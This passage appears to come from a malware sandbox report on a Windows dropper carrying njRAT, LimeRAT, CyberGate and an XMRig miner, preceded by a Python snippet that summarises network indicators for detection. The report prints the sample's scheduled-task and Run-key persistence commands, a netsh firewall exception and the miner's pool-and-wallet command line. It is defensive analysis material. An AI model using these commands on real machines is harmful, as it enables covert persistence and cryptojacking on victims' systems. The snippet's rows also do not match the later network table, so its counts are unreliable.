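The network table is short enough to read by hand, but the same rows are what a detection engineer would feed into a per-host summary: how many lookups, whether any connection followed, and whether the host is dynamic DNS or a paste site. The following Python is an added example for this page, not sandbox tooling; the rows are the twelve listed above, and the dynamic-DNS suffix list and paste-site list are my own short allow-lists, not something the sandbox emits.

```python
"""Aggregate the sandbox Network rows per hostname and annotate them
(added example; rows copied from this report)."""
import re
from collections import defaultdict

NETWORK_ROWS = """\
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 red4.hopto.org udp
"""

ROW_RE = re.compile(r"^(?P<cc>[A-Z]{2}) (?P<ip>[\d.]+):(?P<port>\d+) (?P<domain>\S+) (?P<proto>tcp|udp)$")
# Free dynamic-DNS suffixes operated by No-IP, and paste sites used to host C2 config.
DYNDNS_SUFFIXES = ("hopto.org", "ddns.net", "no-ip.org", "zapto.org", "sytes.net")
PASTE_SITES = ("pastebin.com",)


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def summarise(rows):
    """{domain: {"dns_queries": n, "connections": [(ip, port, proto)], "flags": [...]}}"""
    per = defaultdict(lambda: {"dns_queries": 0, "connections": [], "flags": []})
    for r in rows:
        entry = per[r["domain"]]
        if r["port"] == "53" and r["proto"] == "udp":
            entry["dns_queries"] += 1
        else:
            entry["connections"].append((r["ip"], int(r["port"]), r["proto"]))
    for domain, e in per.items():
        if domain.endswith(DYNDNS_SUFFIXES):
            e["flags"].append("dynamic-dns")
        if domain in PASTE_SITES:
            e["flags"].append("paste-site")
        if e["dns_queries"] and not e["connections"]:
            e["flags"].append("lookup-only")       # resolved (or tried to), never connected
        if e["dns_queries"] >= 5:
            e["flags"].append("repeated-lookup")   # retry loop typical of C2 beaconing
    return dict(per)


if __name__ == "__main__":
    for domain, e in summarise(parse_rows(NETWORK_ROWS)).items():
        print(f"{domain:<20} dns={e['dns_queries']} conns={e['connections']} flags={e['flags']}")
```

The "lookup-only" flag is the one to act on: both the mining pool and the dynamic-DNS C2 host were resolved but never reached during the detonation, so the capture does not prove either channel works, only that the sample tried to reach them.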

Files

memory/1828-54-0x0000000075741000-0x0000000075743000-memory.dmp

\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-25 01:11

Reported

2022-05-25 01:16

Platform

win10v2004-20220414-en

Max time kernel

24s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

Signatures

CyberGate, Rebhip

trojan stealer cybergate

LimeRAT

rat limerat

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner Payload

miner

Modifies Windows Firewall

evasion

UPX packed file

upx

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\n.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\li4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\moxia.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe N/A

Legitimate hosting services abused for malware hosting/C2

AutoIT Executable

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\n.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\n.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 C:\Users\Admin\AppData\Local\Temp\n.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\c.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\moxia.EXE
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 3232 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\li4.exe
PID 2008 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 2008 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\moxia.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\n.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 3232 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 4708 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\li4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 2172 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 2172 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
PID 3004 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 3232 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe
PID 408 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\c.exe C:\Users\Admin\AppData\Local\Temp\c.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe

"C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

"C:\Users\Admin\AppData\Local\Temp\moxia.EXE"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\li4.exe

"C:\Users\Admin\AppData\Local\Temp\li4.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe

C:\Users\Admin\AppData\Local\Temp\n.exe

"C:\Users\Admin\AppData\Local\Temp\n.exe"

C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe

"C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe

C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Users\Admin\AppData\Local\Temp\c.exe

"C:\Users\Admin\AppData\Local\Temp\c.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 4076

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4076 -s 800

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 4644

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4644 -s 800

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\Spectrum\service.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\efsui\data.exe

C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe

"C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 - tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 104.110.191.140:80 - tcp
NL 104.110.191.140:80 - tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 13.69.109.130:443 - tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
NL 104.110.191.133:80 - tcp
NL 104.110.191.133:80 - tcp
NL 104.110.191.133:80 - tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
GB 92.123.143.240:80 - tcp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 red4.hopto.org udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp
US 8.8.8.8:53 de2.moriaxmr.com udp

Files

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

C:\Users\Admin\AppData\Local\Temp\moxia.EXE

MD5 1a47efc2dcfed8aada82c593e5796257
SHA1 97c4c1949fd4ed8cd1b2d2e20ca106a28ce06d38
SHA256 b29e3e4130d2e4c2d4ece5ed419a0652f1bd587c4c7d99453d8b9a0eada57f59
SHA512 34849e7c3400d25fcb48ccb0a13c6652c2acec54f6d847162d5eb52eaeb89c56748961d0e78a9bd587f15df359d1c7b4dc8db3be4cbb20b39d1d03d2279e428f

memory/2008-130-0x0000000000000000-mapping.dmp

memory/3004-133-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\c.exe

